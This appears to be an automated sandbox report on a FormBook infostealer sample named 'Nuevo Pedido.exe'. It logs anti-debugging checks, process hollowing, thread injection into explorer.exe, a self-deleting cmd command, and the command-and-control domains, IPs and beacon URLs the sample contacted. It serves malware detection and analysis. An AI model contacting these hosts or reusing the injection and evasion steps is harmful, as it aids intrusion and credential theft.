Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AF0BF mov ecx, dword ptr fs:[00000030h] 16_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h] 16_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h] 16_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B90AF mov eax, dword ptr fs:[00000030h] 16_2_047B90AF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h] 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04832073 mov eax, dword ptr fs:[00000030h] 16_2_04832073
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04841074 mov eax, dword ptr fs:[00000030h] 16_2_04841074
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779080 mov eax, dword ptr fs:[00000030h] 16_2_04779080
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h] 16_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h] 16_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h] 16_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h] 16_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C962 mov eax, dword ptr fs:[00000030h] 16_2_0477C962
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h] 16_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h] 16_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A513A mov eax, dword ptr fs:[00000030h] 16_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A513A mov eax, dword ptr fs:[00000030h] 16_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov eax, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 mov ecx, dword ptr fs:[00000030h] 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048041E8 mov eax, dword ptr fs:[00000030h] 16_2_048041E8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779100 mov eax, dword ptr fs:[00000030h] 16_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779100 mov eax, dword ptr fs:[00000030h] 16_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779100 mov eax, dword ptr fs:[00000030h] 16_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h] 16_2_047F51BE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F69A6 mov eax, dword ptr fs:[00000030h] 16_2_047F69A6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h] 16_2_047A61A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h] 16_2_047A61A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2990 mov eax, dword ptr fs:[00000030h] 16_2_047A2990
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479C182 mov eax, dword ptr fs:[00000030h] 16_2_0479C182
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA185 mov eax, dword ptr fs:[00000030h] 16_2_047AA185
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B927A mov eax, dword ptr fs:[00000030h] 16_2_047B927A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04779240 mov eax, dword ptr fs:[00000030h] 16_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h] 16_2_047B4A2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h] 16_2_047B4A2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h] 16_2_0477AA16
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h] 16_2_0477AA16
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04793A1C mov eax, dword ptr fs:[00000030h] 16_2_04793A1C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov eax, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov ecx, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov eax, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04775210 mov eax, dword ptr fs:[00000030h] 16_2_04775210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04788A0A mov eax, dword ptr fs:[00000030h] 16_2_04788A0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2AE4 mov eax, dword ptr fs:[00000030h] 16_2_047A2AE4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2ACB mov eax, dword ptr fs:[00000030h] 16_2_047A2ACB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AFAB0 mov eax, dword ptr fs:[00000030h] 16_2_047AFAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h] 16_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483EA55 mov eax, dword ptr fs:[00000030h] 16_2_0483EA55
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04804257 mov eax, dword ptr fs:[00000030h] 16_2_04804257
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0482B260 mov eax, dword ptr fs:[00000030h] 16_2_0482B260
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00409B40 LdrLoadDll, 3_2_00409B40
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.rcepjobs.com
Source: C:\Windows\explorer.exe Domain query: www.sosibibyslot.website
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.91 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tremblock.com
Source: C:\Windows\explorer.exe Domain query: www.securebankofamericalog.site
Source: C:\Windows\explorer.exe Domain query: www.thejohnmatt.com
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe Domain query: www.onlinedatingthaiweb.com
Source: C:\Windows\explorer.exe Network Connect: 192.232.250.147 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.53.178.53 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.downingmunroe.online
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: A50000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 3472 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" Jump to behavior
Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.290583632.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.285226042.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.272484654.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.251544899.00000000089FF000.00000004.00000001.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000005.00000000.279791809.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.242187567.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.258666417.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Users\user\Desktop\Nuevo Pedido.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528617 Sample: Nuevo Pedido.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 36 www.trenddoffical.com 2->36 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 11 Nuevo Pedido.exe 3 2->11         started        signatures3 process4 file5 28 C:\Users\user\...28uevo Pedido.exe.log, ASCII 11->28 dropped 14 Nuevo Pedido.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 thejohnmatt.com 192.232.250.147, 49838, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 www.tremblock.com 185.53.178.53, 49784, 80 TEAMINTERNET-ASDE Germany 17->32 34 8 other IPs or domains 17->34 38 System process connects to network (likely due to code injection or exploit) 17->38 21 cscript.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.53.179.91
 www.onlinedatingthaiweb.com Germany
61969 TEAMINTERNET-ASDE true
192.232.250.147
 thejohnmatt.com United States
46606 UNIFIEDLAYER-AS-1US true
185.53.178.53
 www.tremblock.com Germany
61969 TEAMINTERNET-ASDE true
3.64.163.50
 www.rcepjobs.com United States
16509 AMAZON-02US true
209.17.116.163
 www.downingmunroe.online United States
55002 DEFENSE-NETUS true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
www.rcepjobs.com 3.64.163.50 true
www.tremblock.com 185.53.178.53 true
thejohnmatt.com 192.232.250.147 true
www.downingmunroe.online 209.17.116.163 true
www.onlinedatingthaiweb.com 185.53.179.91 true
www.sosibibyslot.website unknown unknown
www.securebankofamericalog.site unknown unknown
www.thejohnmatt.com unknown unknown
www.trenddoffical.com unknown unknown
www.blueprintroslyn.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN true
  • Avira URL Cloud: safe
 unknown
http://www.thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN true
  • Avira URL Cloud: safe
 unknown
http://www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN true
  • Avira URL Cloud: safe
 unknown
www.spoiledzone.com/udeh/ true
  • Avira URL Cloud: safe
 low
http://www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN true
  • Avira URL Cloud: safe
 unknown
http://www.tremblock.com/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN true
  • Avira URL Cloud: safe
 unknown